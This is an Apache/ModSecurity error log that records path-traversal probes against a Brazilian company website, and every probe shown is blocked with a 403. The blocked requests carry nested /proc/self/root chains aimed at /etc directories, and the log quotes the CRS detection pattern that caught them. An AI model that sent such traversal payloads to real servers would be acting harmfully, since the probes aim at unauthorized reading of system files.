[Mon Mar 16 22:08:19.096087 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.243.203:51278] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipg7ABkC4fWIHEf8Eu6wAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:21.603100 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:43986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiphbABkC4fWIHEf8Eu7gAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:22.902874 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:43994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiphtSswJuvopo3lOiTdgAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:25.259712 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:43996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipif9ocpUE4ed4uDwnRwAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:26.502322 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:44002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipitSswJuvopo3lOiTegAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:27.650858 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.243.203:44008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipi6TCbgAP5jq5TehdRwAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:28.993279 2026] [:error] [pid 29802:tid 140411641214720] [client 74.7.243.203:44024] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipjM_BxrYCr4hPDw8cuwAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:29.371520 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.228.16:60706] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abipjf9ocpUE4ed4uDwnSwAAAhE"]
[Mon Mar 16 22:08:30.315111 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.243.203:34796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipjs_BxrYCr4hPDw8cvQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:32.551004 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.241.46:59216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipkFajLEzk2WiQ-11FhQAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:33.983067 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:51936] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipkc_BxrYCr4hPDw8cvgAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:08:35.006506 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.243.203:34812] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipk6TCbgAP5jq5TehdTAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:37.855281 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:34818] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipldSswJuvopo3lOiTggAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:38.863244 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.241.46:51940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiplkr9dMAiw-8KANN7cgAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:08:40.315535 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.243.203:34830] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipmM_BxrYCr4hPDw8cwwAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:41.707130 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.243.203:40662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipmaTCbgAP5jq5TehdTQAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:44.373694 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.244.31:51452] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abipnNSswJuvopo3lOiTgwAAAIE"]
[Mon Mar 16 22:09:33.593799 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:40666] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipzbysWC90G-1nBrB2dQAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:09:39.297861 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:40666] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip07ysWC90G-1nBrB2ewAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:09:41.726819 2026] [:error] [pid 29802:tid 140411725141760] [client 74.7.243.203:37302] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip1c_BxrYCr4hPDw8c3AAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:09:44.232760 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.243.203:37310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip2M_BxrYCr4hPDw8c3gAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:09:46.023030 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.243.203:37324] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip2s_BxrYCr4hPDw8c3wAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:09:56.121325 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:37332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip5I6lpbStxTqkSkuYEAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:09:58.091214 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:37332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip5I6lpbStxTqkSkuYEQAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
